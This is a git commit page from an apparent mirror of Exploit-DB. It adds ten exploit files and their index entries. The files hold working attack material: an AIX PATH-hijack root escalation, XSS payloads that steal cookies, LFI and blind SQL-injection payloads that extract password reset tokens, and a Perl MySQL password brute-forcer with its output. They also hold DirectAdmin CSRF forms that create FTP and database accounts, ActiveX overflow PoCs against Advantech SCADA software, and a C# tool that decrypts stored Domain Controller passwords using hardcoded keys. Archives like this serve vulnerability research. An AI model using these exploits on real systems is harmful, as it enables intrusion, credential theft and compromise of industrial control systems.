bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-09

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2015-09-09 05:02:50 +00:00
parent 8b29a6e1e8
commit 97d811ea96
11 changed files with 510 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -34073,6 +34073,8 @@ id,file,description,date,author,platform,type,port
37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
38106,platforms/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) Local Privilege Escalation 0day",2015-09-08,"Kristian Erik Hermansen",aix,local,0
38107,platforms/windows/local/38107.c,"Cisco Sourcefire User Agent 2.2 - Insecure File Permissions",2015-09-08,"Glafkos Charalambous ",windows,local,0
37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS DoS",2015-08-08,"Juan Sacco",osx,dos,0
37824,platforms/php/webapps/37824.txt,"WordPress WP Symposium Plugin 15.1 - SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80
37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
@ -34389,6 +34391,7 @@ id,file,description,date,author,platform,type,port
38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross Site Scripting Vulnerability",2012-12-01,eidelweiss,php,webapps,0
38080,platforms/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps,0
38081,platforms/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - CSRF Vulnerabilities",2015-09-04,"Ken Smith",hardware,webapps,80
38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
@ -34396,7 +34399,14 @@ id,file,description,date,author,platform,type,port
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0
38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances Multiple Cross Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0
38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include Vulnerability",2012-12-30,Amirh03in,php,webapps,0
38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection Vulnerability",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection Vulnerability",2012-12-04,AkaStep,php,webapps,0
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,"John Page",jsp,webapps,8081
38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0

Can't render this file because it is too large.

22
platforms/aix/local/38106.txt Executable file
View file

@ -0,0 +1,22 @@
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
Let's kill some more bugs today and force vendor improvement :)
"""
$ cat /tmp/su
#!/bin/sh
/bin/sh
$ chmod +x /tmp/su
$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
# /usr/bin/whoami
root
"""
References:
https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
--

17
platforms/hardware/remote/38100.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/56774/info
Multiple Fortinet FortiWeb Appliances are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following FortiWeb application series are vulnerable:
FortiWeb-4000C
FortiWeb-3000C/3000CFsx
FortiWeb-1000C
FortiWeb-400C and
FortiWeb Virtual Appliance
https://www.example.com/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0

51
platforms/linux/remote/38109.pl Executable file
View file

@ -0,0 +1,51 @@
source: http://www.securityfocus.com/bid/56837/info
MySQL and MariaDB are prone to a security-bypass weakness.
An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible.
use Net::MySQL;
$|=1;
my $mysql = Net::MySQL->new(
hostname => '192.168.2.3',
database => 'test',
user => "user",
password => "secret",
debug => 0,
);
$crackuser = "crackme";
while(<stdin>) {
chomp;
$currentpass = $_;
$vv = join "\0",
$crackuser,
"\x14".
Net::MySQL::Password->scramble(
$currentpass, $mysql->{salt}, $mysql->{client_capabilities}
) . "\0";
if ($mysql->_execute_command("\x11", $vv) ne undef) {
print "[*] Cracked! --> $currentpass\n";
exit;
}
}
---
example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted

9
platforms/php/webapps/38099.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56767/info
TinyMCPUK is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
TinyMCPUK 0.3 is vulnerable; other versions may also be affected.
http://www.example.com/filemanager/connectors/php/connector.php?test=&lt;h1&gt;p0c&lt;/h1&gt;&amp;xss=&lt;script&gt;alert(document.cookie)&lt;/script&gt;

7
platforms/php/webapps/38101.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56777/info
The Zingiri Forums plugin for WordPress is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
http://www.example.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=[Directory or file]

7
platforms/php/webapps/38102.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56792/info
The Nest theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/nest/gerador_galeria.php?codigo=[Sqli]

10
platforms/php/webapps/38103.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/56800/info
Newscoop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Newscoop 4.0.2 is vulnerable; other versions may also be affected.
Script: /admin/password_recovery.php
Payload: f_post_sent=1&f_email=example@example.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password

94
platforms/php/webapps/38110.txt Executable file
View file

@ -0,0 +1,94 @@
=============================================================================
[+] Exploit Title : DirectAdmin Web Control Panel CSRF/XSS vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Date : 1.483
[+] Version : 2015/09/08
[+] Tested on : Elementary Os
[+] Vendor Homepage : http://www.directadmin.com/
=============================================================================
[+] Introduction :
DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier.
DirectAdmin suffers from cross site request forgery and cross site scripting vulnerabilities
=============================================================================
[+] CMD_FILE_MANAGER :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit 1: Create New File and Edit a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="text" value="<?php //codes ?>">
<input type="hidden" name="filename" value="index.php">
<input type="submit" onClick="save=0;" value="Save As">
-----------------------------------------------------------------------------
[+] Exploit 2: Create a New Folder
<form name=folderform action="/CMD_FILE_MANAGER" method="POST">
<input type="hidden name=action value="folder">
<input type="hidden name="path" value="/domains/iceschool.ir/public_html">
<input type="hidden" name="name" value="Folder">
<input type=submit value="Create">
</form>
-----------------------------------------------------------------------------
[+] Exploit 3: Rename a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type=hidden name=action value="rename">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="old" value="Oldname">
<input type="hidden" name="filename" value="Newname">
<input type="hidden" name="overwrite" value="yes">
<input type="submit" value="Rename">
</form>
-----------------------------------------------------------------------------
[+] Exploit 4 : Reflected XSS
<form name='info' action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value='/xss/"><script>alert(/XSS Vuln/)</script>'>
<input type="hidden" name="text" value="xss">
<input type="hidden" name="filename" value="xss">
<input type="submit" onClick="save=0;" value="Save As">
</form>
=============================================================================
[+] CMD_FTP :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create FTP account
<form name="reseller" action="http://address:port/CMD_FTP" method="post">
<input style="display:none" type="text" name="fakeusernameremembered"/>
<input style="display:none" type="password" name="fakepasswordremembered"/>
<input type="hidden" name="action" value="create">
<input type="hidden" name="domain" value="domain.xyz"> <!-- Example : ashiyane.org -->
<input type="hidden" name="user" value="ehsan">
<input type="hidden" name="passwd" value="pass1234">
<input type="hidden" name="passwd2" value="pass1234">
<input type="hidden" name="type" value="domain" checked>
<input type="hidden" name="type" value="ftp">
<input type="hidden" name="type" value="user">
<input type="hidden" name="type" value="custom">
<input type="hidden" name="custom_val" value="/home/domain"> <!-- Example : /home/ashiyane -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_DB :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create new Database
<form name=reseller action="http://address:port/CMD_DB" method="post">
<input type="hidden" name=action value=create>
<input type="hidden" name=domain value="domain.xyz"> <!-- Domain -->
<input type="hidden" name="name" value="dbname"> <!-- Database Name -->
<input type="hidden" name="user" value="ehsan"> <!-- Username -->
<input type="hidden" name="passwd" value="pass1234"> <!-- Password -->
<input type="hidden" name="passwd2" value="pass1234"> <!-- Password -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_DB :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create new E-Mail Forwarder
<form name=info action="CMD_EMAIL_FORWARDER" method="post">
<input type=hidden name=action value=create>
<input type=hidden name=domain value="domain.xyz"><!-- Domain -->
<input type="hidden" name="user" value="info"> <!-- Forwarder Name -->
<input type="hidden" name="email" value="hehsan979@gmail.com"> <!-- Destination Email -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] Discovered By : Ehsan Hosseini (hehsan979@gmail.com)

173
platforms/windows/dos/38108.txt Executable file
View file

@ -0,0 +1,173 @@
Introduction
*********************************************************************************
Using Advantech WebAccess SCADA Software we can remotely manage Industrial
Control systems devices like RTU's, Generators, Motors etc. Attackers can
execute code remotely by passing maliciously crafted string to
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.
Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName
As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal
ProjTimeout As Long , ByVal ProjDir As String )"
-->
arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"
target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6
</script></html>
</html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->
arg1=String(1044, "A")
target.InterfaceFilter arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As
String )"
-->
arg1=1
arg2=String(1044, "A")
target.FileProcess arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr
As String ) As String"
-->
arg1=1
arg2=String(1044, "A")
target.GetWideStrCpy arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal
filePath As String )"
-->
arg1=1
arg2=String(1044, "A")
target.GetRecipeInfo arg1 ,arg2
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->
arg1=String(1044, "A")
target.GetLastTagNbr arg1
</script></html>
*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal
inStr As String )"
-->
arg1=1
arg2=String(2068, "A")
target.ConvToSafeArray arg1 ,arg2
</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC.From April 2015 they has been postponing the
fix.

110
platforms/windows/local/38107.c Executable file
View file

@ -0,0 +1,110 @@
/*
Cisco Sourcefire User Agent Insecure File Permissions Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco SF User Agent 2.2
Fixed version(s):
Cisco SF User Agent 2.2-25
Date: 08/09/2015
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
BugId: CSCut44881
Disclosure Timeline:
18-03-2015: Vendor Notification
19-03-2015: Vendor Response/Feedback
01-09-2015: Vendor Fix/Patch
08-09-2015: Public Disclosure
Description:
Sourcefire User Agent monitors Microsoft Active Directory servers and report logins and logoffs authenticated via LDAP.
The FireSIGHT System integrates these records with the information it collects via direct network traffic observation by managed devices.
Vulnerability:
Sourcefire User Agent is vulnerable to default insecure file permissions and hardcoded encryption keys.
A local attacker can exploit this by gaining access to user readable database file and extracting sensitive information.
In combination with hard-coded 3DES keys an attacker is able to decrypt configured Domain Controller accounts which can lead
to further attacks.
C:\Users\0x414141>icacls "C:\SourcefireUserAgent.sdf"
C:\SourcefireUserAgent.sdf BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Mandatory Label\High Mandatory Level:(I)(NW)
Successfully processed 1 files; Failed processing 0 files
*/
using System;
using System.Text;
using System.Security.Cryptography;
using System.Data.SqlServerCe;
namespace SFDecrypt
{
class Program
{
static void Main(string[] args)
{
SqlCeConnection conn = null;
try
{
string FileName = @"C:\SourcefireUserAgent.sdf";
string ConnectionString = string.Format("DataSource=\"{0}\";Mode = Read Only;Temp Path =C:\\Windows\\Temp", FileName);
conn = new SqlCeConnection(ConnectionString);
string query = "Select host, domain, username, password FROM active_directory_servers";
SqlCeCommand cmd = new SqlCeCommand(query, conn);
conn.Open();
SqlCeDataReader rdr = cmd.ExecuteReader();
while (rdr.Read())
{
string strHost = rdr.GetString(0);
string strDom = rdr.GetString(1);
string strUser = rdr.GetString(2);
string strPass = rdr.GetString(3);
Console.WriteLine("Host: " + strHost + " Domain: " + strDom + " Username: " + strUser + " Password: " + Decrypt.Decrypt3DES(strPass));
}
rdr.Close();
}
catch (Exception exception)
{
Console.Write(exception.ToString());
}
finally
{
conn.Close();
}
}
}
class Decrypt
{
public static string Decrypt3DES(string strEncrypted)
{
string strDecrypted = "";
try
{
TripleDESCryptoServiceProvider provider = new TripleDESCryptoServiceProvider();
provider.Key = Encoding.UTF8.GetBytes("50uR<3F1r3R0xDaH0u5eW0o+");
provider.IV = Encoding.UTF8.GetBytes("53cUri+y");
byte[] inputBuffer = Convert.FromBase64String(strEncrypted);
byte[] bytes = provider.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length);
strDecrypted = Encoding.Unicode.GetString(bytes);
}
catch (Exception exception)
{
Console.Write("Error Decrypting Data: " + exception.Message);
}
return strDecrypted;
}
}
}
References:
https://tools.cisco.com/bugsearch/bug/CSCut44881